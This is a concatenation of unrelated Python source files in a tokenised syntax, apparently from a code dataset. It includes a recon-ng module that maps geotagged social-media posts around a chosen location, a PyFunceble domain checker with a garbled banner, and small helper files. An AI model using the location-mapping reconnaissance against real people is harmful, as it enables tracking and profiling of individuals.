<import_from_stmt>recon.core.module BaseModule<import_stmt>codecs<import_stmt>os<import_stmt>re<import_stmt>time<import_stmt>webbrowser<class_stmt>Module(BaseModule)<block_start>meta={'name':'PushPin Report Generator' 'author':'<NAME> (@LaNMaSteR53)' 'description':'Creates HTML media and map reports for all of the PushPins stored in the database.' 'options':(('latitude' <none> <true> 'latitude of the epicenter') ('longitude' <none> <true> 'longitude of the epicenter') ('radius' <none> <true> 'radius from the epicenter in kilometers') ('map_filename' os.path.join(BaseModule.workspace 'pushpin_map.html') <true> 'path and filename for pushpin map report') ('media_filename' os.path.join(BaseModule.workspace 'pushpin_media.html') <true> 'path and filename for pushpin media report') ) }<def_stmt>remove_nl self x repl=''<block_start><return>re.sub('[\r\n]+' repl self.html_escape(x))<block_end><def_stmt>build_content self sources<block_start>icons={'flickr':'http://maps.google.com/mapfiles/ms/icons/orange-dot.png' 'instagram':'http://maps.google.com/mapfiles/ms/icons/pink-dot.png' 'picasa':'http://maps.google.com/mapfiles/ms/icons/purple-dot.png' 'shodan':'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png' 'twitter':'http://maps.google.com/mapfiles/ms/icons/blue-dot.png' 'youtube':'http://maps.google.com/mapfiles/ms/icons/red-dot.png' }<line_sep>media_content=''<line_sep>map_content=''<line_sep>map_arrays=''<line_sep>map_checkboxes=''<for_stmt>source sources<block_start>count=source[0]<line_sep>source=source[1]<line_sep>map_arrays<augadd>'var %s = [];\n'%(source.lower())<line_sep>map_checkboxes<augadd>'<input type="checkbox" id="%s" onchange="toggleMarkers(\'%s\');" checked="checked"/>%s<br />\n'%(source.lower() source.lower() source)<line_sep>media_content<augadd>'<div class="media_column %s">\n<div class="media_header"><div class="media_summary">%s</div>%s</div>\n'%(source.lower() count source.capitalize())<line_sep>items=self.query('SELECT * FROM pushpins WHERE 
source=?' (source ))<line_sep>items.sort(key=<lambda>x:x[9] reverse=<true>)<for_stmt>item items<block_start>item=[self.to_unicode_str(x)<if>x<ne><none><else>u''<for>x item]<line_sep>media_content<augadd>'<div class="media_row"><div class="prof_cell"><a href="%s" target="_blank"><img class="prof_img rounded" src="%s" /></a></div><div class="data_cell"><div class="trigger" id="trigger" lat="%s" lon="%s">[<a href="%s" target="_blank">%s</a>] %s<br /><span class="time">%s</span></div></div></div>\n'%(item[4] item[5] item[7] item[8] item[3] item[2] self.remove_nl(item[6] '<br />') item[9])<line_sep>map_details="<table><tr><td class='prof_cell'><a href='%s' target='_blank'><img class='prof_img rounded' src='%s' /></a></td><td class='data_cell'>[<a href='%s' target='_blank'>%s</a>] %s<br /><span class='time'>%s</span></td></tr></table>"%(item[4] item[5] item[3] self.remove_nl(item[2]) self.remove_nl(item[6] '<br />') item[9])<line_sep>map_content<augadd>'add_marker({position: new google.maps.LatLng(%s,%s),title:"%s",icon:"%s",map:map},{details:"%s"}, "%s");\n'%(item[7] item[8] self.remove_nl(item[2]) icons[source.lower()] map_details source.lower())<block_end>media_content<augadd>'</div>\n'<block_end><return>(media_content ) (map_content map_arrays map_checkboxes)<block_end><def_stmt>write_markup self template filename content<block_start>temp_content=open(template).read()<line_sep>page=temp_content%content<with_stmt>codecs.open(filename 'wb' 'utf-8')<as>fp<block_start>fp.write(page)<block_end><block_end><def_stmt>module_run self<block_start>sources=self.query('SELECT COUNT(source), source FROM pushpins GROUP BY source')<line_sep>media_content,map_content=self.build_content(sources)<line_sep>meta_content=(self.options['latitude'] self.options['longitude'] self.options['radius'])<line_sep># create the media report
media_content=meta_content+media_content<line_sep>media_filename=self.options['media_filename']<line_sep>self.write_markup(os.path.join(self.data_path 'template_media.html') media_filename media_content)<line_sep>self.output('Media data written to \'%s\''%(media_filename))<line_sep># order the map_content tuple
map_content=meta_content+map_content<line_sep>order=[4 0 1 2 3 5]<line_sep>map_content=tuple([map_content[i]<for>i order])<line_sep># create the map report
map_filename=self.options['map_filename']<line_sep>self.write_markup(os.path.join(self.data_path 'template_map.html') map_filename map_content)<line_sep>self.output('Mapping data written to \'%s\''%(map_filename))<line_sep># open the reports in a browser
w=webbrowser.get()<line_sep>w.open(media_filename)<line_sep>time.sleep(2)<line_sep>w.open(map_filename)<block_end><block_end> |
"""
The tool to check the availability or syntax of domain, IP or URL.
::
โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโ โโโ โโโโโโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโ โโโโโโ
โโโโโโโ โโโโโ โโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโ โโโโโโ
โโโ โโโ โโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโ โโโโโโโ โโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ
Provides the base of all domain syntax checker.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_stmt>functools<import_from_stmt>typing Optional Tuple<import_from_stmt>PyFunceble.checker.base CheckerBase<import_from_stmt>PyFunceble.dataset.iana IanaDataset<import_from_stmt>PyFunceble.dataset.public_suffix PublicSuffixDataset<class_stmt>DomainSyntaxCheckerBase(CheckerBase)<block_start>"""
Provides an interface to check the syntax of a second domain.
:param str subject:
Optional, The subject to work with.
"""<line_sep># pylint: disable=line-too-long
SPECIAL_USE_DOMAIN_NAMES_EXTENSIONS=["onion"]<line_sep>"""
Specifies the extension which are specified as "Special-Use Domain Names"
and supported by our project.
:type: list
.. seealso::
* `RFC6761`_
* `IANA Special-Use Domain Names`_ assignments.
* `RFC7686`_
.. _RFC6761: https://tools.ietf.org/html/rfc6761
.. _RFC7686: https://tools.ietf.org/html/rfc6761
.. _IANA Special-Use Domain Names: https://www.iana.org/assignments/special-use-domain-names/special-use-domain-names.txt
"""<line_sep>last_point_index:Optional[int]=<none><line_sep>"""
Saves the index of the last point.
"""<line_sep>iana_dataset:Optional[IanaDataset]=<none><line_sep>public_suffix_dataset:Optional[PublicSuffixDataset]=<none><def_stmt>__init__ self subject:Optional[str]=<none><arrow><none><block_start>self.iana_dataset=IanaDataset()<line_sep>self.public_suffix_dataset=PublicSuffixDataset()<line_sep>super().__init__(subject)<block_end><def_stmt>reset_last_point_index func# pylint: disable=no-self-argument
<block_start>"""
Resets the last point index before executing the decorated method.
"""<line_sep>@functools.wraps(func)<def_stmt>wrapper self *args **kwargs<block_start>self.last_point_index=<none><line_sep><return>func(self *args **kwargs)<block_end># pylint: disable=not-callable
<return>wrapper<block_end><def_stmt>find_last_point_index func# pylint: disable=no-self-argument
<block_start>"""
Try to find the index of the last point after the execution of the
decorated method.
"""<line_sep>@functools.wraps(func)<def_stmt>wrapper self *args **kwargs<block_start>result=func(self *args **kwargs)# pylint: disable=not-callable
self.last_point_index=self.get_last_point_index(self.idna_subject)<line_sep><return>result<block_end><return>wrapper<block_end>@CheckerBase.subject.setter@reset_last_point_index@find_last_point_index<def_stmt>subject self value:str<block_start>"""
Sets the subject to work with.
:param value:
The subject to set.
:raise TypeError:
When the given :code:`value` is not a :py:class:`str`.
:raise ValueError:
When the given :code:`value` is empty.
"""<line_sep># pylint: disable=no-member
super(DomainSyntaxCheckerBase self.__class__).subject.fset(self value)<block_end>@staticmethod<def_stmt>get_last_point_index subject:str<arrow>Optional[int]<block_start>"""
Provides the index of the last point of the given subject.
"""<try_stmt><block_start><if_stmt>subject.endswith(".")<block_start><return>subject[:-1].rfind(".")<block_end><return>subject.rindex(".")<block_end><except_stmt>ValueError<block_start><return><none><block_end><block_end><def_stmt>get_subject_without_suffix self subject:str extension:str<arrow>Optional[Tuple[Optional[int] Optional[str]]]<block_start>"""
Provides the given subject without the suffix.
:param subject:
The subject to work with.
:param extension:
The extension previously extracted.
"""<if_stmt>extension<in>self.public_suffix_dataset<block_start><for_stmt>suffix self.public_suffix_dataset.get_available_suffix(extension)<block_start><try_stmt><block_start><return>subject[:subject.rindex(f".{suffix}")] suffix<block_end><except_stmt>ValueError<block_start><continue><block_end><block_end><block_end><return><none> <none><block_end>@CheckerBase.ensure_subject_is_given<def_stmt>get_extension self<arrow>Optional[str]<block_start>"""
Provides the extension to work with (if exists).
"""<if_stmt>self.last_point_index<is><none><block_start><return><none><block_end># Plus one is for the leading point.
extension=self.idna_subject[self.last_point_index+1:]<if_stmt>extension.endswith(".")<block_start>extension=extension[:-1]<block_end><return>extension<block_end><def_stmt>is_valid self<arrow>bool<block_start>"""
Validate the given subject.
"""<line_sep><raise>NotImplementedError()<block_end><block_end> |
<import_from_stmt>os.path abspath dirname join<line_sep>WORLDGEN_ROOT_PATH=abspath(join(dirname(__file__) '..' '..'))<def_stmt>worldgen_path *args<block_start>"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""<line_sep><return>join(WORLDGEN_ROOT_PATH *args)<block_end> |
# + tags=["parameters"]
1+1<line_sep> |
<import_from_stmt>django.apps AppConfig<class_stmt>CodesamplesAppConfig(AppConfig)<block_start>name='codesamples'<block_end> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.